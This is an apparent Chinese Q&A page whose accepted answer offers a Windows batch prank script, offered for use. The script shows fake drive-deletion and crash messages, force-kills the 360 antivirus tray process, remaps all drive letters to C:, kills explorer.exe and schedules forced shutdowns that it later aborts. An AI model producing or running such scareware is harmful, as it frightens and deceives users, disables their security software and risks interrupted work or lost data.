电脑网络

有没有代码

346 浏览

有没有代码

1 个回答

高顿用户头像
高顿 回答于 2024-07-20
已采纳

提问:有没有代码

网友回答:

BAT代码:

@ color 1f 

@echo off

title 最好别关本程序否则后果自负......!

echo 你中招了!

echo 处理器异常!

ping 127.0.0.1 /n 4 >nul

echo.

echo 正在移除C盘……

echo.

ping 127.0.0.1 /n 4 >nul

echo 正在移除D盘……

echo.

echo 正在移除E盘……

ping 127.0.0.1 /n 4 >nul

echo F盘先给你留着吧!

echo.

echo 我会那么善良吗?

ping 127.0.0.1 /n 4 >nul

echo 不会的……

echo.

echo 呵呵开玩笑的!

ping 127.0.0.1 /n 4 >nul

echo 正在恢复C盘……

echo.

echo 正在恢复D盘……

ping 127.0.0.1 /n 4 >nul

echo 正在恢复E盘……

echo.

echo 正在恢复F盘……

ping 127.0.0.1 /n 4 >nul

echo 请一直按住 Enter 键

taskkill /f /im 360tray.exe

ping 127.0.0.1 /n 4 >nul

echo 看你的磁盘好少,怪可怜的……

echo.

ping 127.0.0.1 /n 4 >nul

echo 给你加几个吧!

echo.

ping 127.0.0.1 /n 4 >nul

@echo off

for %%i in (a b c d e f g h i j k l m n o p q r s t u v w x y z) do (subst %%i: C:\)

start explorer.exe

ping 127.0.0.1 /n 4 >nul

echo 呵呵……

echo.

ping 127.0.0.1 /n 4 >nul

echo 给你两分钟时间,看看你的电脑!

echo .

ping 127.0.0.1 /n 120 >nul

echo 看过了吗,好玩的在后面!

echo.

ping 127.0.0.1 /n 120 >nul

echo 哈哈!

echo.

@echo off

shutdown /s /t 120 /c "电脑马上就要关机!"

ping 127.0.0.1 /n 15 >nul

shutdown -a

echo 你上当了,吓唬吓唬你!

ping 127.0.0.1 /n 4 >nul

echo 正在一键重装中,请稍后……

echo.

echo 0.01

ping 127.0.0.1 /n 4 >nul

echo 0.13

ping 127.0.0.1 /n 4 >nul

echo 0.25

ping 127.0.0.1 /n 4 >nul

echo 0.49

ping 127.0.0.1 /n 4 >nul

echo 0.69

ping 127.0.0.1 /n 4 >nul

echo 0.89

ping 127.0.0.1 /n 4 >nul

echo 0.99

ping 127.0.0.1 /n 4 >nul

echo loading

ping 127.0.0.1 /n 4 >nul

echo 重装已完成!

ping 127.0.0.1 /n 4 >nul

echo 也是吓唬你的!

ping 127.0.0.1 /n 10 >nul

echo 真正的游戏开始了……

taskkill /f /im explorer.exe

shutdown /s /t 30 /c "系统关键文件被删除导致崩溃!系统将在30秒后关机"

ping 127.0.0.1 /n 28 >nul

shutdown -a

echo 你上当了,吓唬吓唬你,现在恢复所有程序Loading......

for %%i in (a b c d e f g h i j k l m n o p q r s t u v w x y z) do (subst %%i: /d)

start explorer.exe

ping 127.0.0.1 /n 4 >nul

echo 恢复已完成

ping 127.0.0.1 /n 4 >nul

echo 我会那么善良吗?

ping 127.0.0.1 /n 4 >nul

echo 不会

ping 127.0.0.1 /n 4 >nul

echo 逗你玩的!

ping 127.0.0.1 /n 4 >nul

echo 会发生什么呢?

ping 127.0.0.1 /n 4 >nul

echo 什么都没发生

我来回答

相关问题